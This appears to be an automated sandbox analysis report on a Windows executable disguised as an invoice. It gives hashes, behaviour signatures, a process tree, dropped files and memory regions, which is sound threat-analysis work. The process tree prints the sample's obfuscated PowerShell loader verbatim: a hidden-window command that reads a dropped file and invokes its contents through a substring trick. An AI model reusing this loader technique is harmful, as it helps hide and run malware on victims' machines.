Analysis

  • max time kernel
    95s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-08-2024 18:47

General

  • Target

    PI_2024088_09272537_981672-HTE025783927.exe

  • Size

    580KB

  • MD5

    b3c9a65102bfef4a579036802b474af3

  • SHA1

    faf15c8d7e8337e9f3b61d1943117b4f0b8a90d0

  • SHA256

    d03270724cdd652a3c7463024b13b1d25440428a9dadd050424c9ff93a365c53

  • SHA512

    82a91edd4e823bcbbbf6bf78483b649d90d28db048934e00b1d10c67193bb30797bb6c46b098dabe6dbdd4c16716052e2df086ed7d36f781d15fe3535f4e9261

  • SSDEEP

    12288:Pq5X6hWBXTWLSGP1UrsCieglBGcmdzmT8QGFLSNqVTNy:PyTWLSGP1Ursd90RYIVZy

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PI_2024088_09272537_981672-HTE025783927.exe
    "C:\Users\Admin\AppData\Local\Temp\PI_2024088_09272537_981672-HTE025783927.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$monopolizer=Get-Content 'C:\Users\Admin\AppData\Roaming\spidskandidater\tidsbegrnsningen\Poolene.Dyr';$Geochemist11=$monopolizer.SubString(52658,3);.$Geochemist11($monopolizer)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2776
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 2128
        3⤵
        • Program crash
        PID:3652
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2776 -ip 2776
    1⤵
      PID:1792

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d33ali4h.vo5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\spidskandidater\tidsbegrnsningen\Poolene.Dyr

      Filesize

      51KB

      MD5

      0555a0781d413ef9d55ae5cf7889c536

      SHA1

      9505dc0689854f33d4124d81733aeb2cd2436327

      SHA256

      ee9ed3183437cabff4add4da2238f6ca2972d7a7257545315e60aafaf90fec4b

      SHA512

      1d7a9ea5cab36b4d598f3c448cf8bb1640b7a5e7d962d849b235e7b42523f91b98c6759b2d3d205424f97937bf90a3d0eaa082d845f2b34cad49e160e6df3d49

    • memory/2776-13-0x0000000073340000-0x0000000073AF0000-memory.dmp

      Filesize

      7.7MB

    • memory/2776-27-0x0000000005DC0000-0x0000000005E0C000-memory.dmp

      Filesize

      304KB

    • memory/2776-12-0x0000000004D50000-0x0000000004D72000-memory.dmp

      Filesize

      136KB

    • memory/2776-15-0x00000000056C0000-0x0000000005726000-memory.dmp

      Filesize

      408KB

    • memory/2776-14-0x0000000005650000-0x00000000056B6000-memory.dmp

      Filesize

      408KB

    • memory/2776-10-0x0000000004FB0000-0x00000000055D8000-memory.dmp

      Filesize

      6.2MB

    • memory/2776-8-0x000000007334E000-0x000000007334F000-memory.dmp

      Filesize

      4KB

    • memory/2776-25-0x00000000057B0000-0x0000000005B04000-memory.dmp

      Filesize

      3.3MB

    • memory/2776-26-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

      Filesize

      120KB

    • memory/2776-11-0x0000000073340000-0x0000000073AF0000-memory.dmp

      Filesize

      7.7MB

    • memory/2776-28-0x0000000006D40000-0x0000000006DD6000-memory.dmp

      Filesize

      600KB

    • memory/2776-29-0x00000000062C0000-0x00000000062DA000-memory.dmp

      Filesize

      104KB

    • memory/2776-30-0x0000000006310000-0x0000000006332000-memory.dmp

      Filesize

      136KB

    • memory/2776-31-0x0000000007390000-0x0000000007934000-memory.dmp

      Filesize

      5.6MB

    • memory/2776-9-0x0000000000FA0000-0x0000000000FD6000-memory.dmp

      Filesize

      216KB

    • memory/2776-33-0x0000000007FC0000-0x000000000863A000-memory.dmp

      Filesize

      6.5MB

    • memory/2776-35-0x0000000073340000-0x0000000073AF0000-memory.dmp

      Filesize

      7.7MB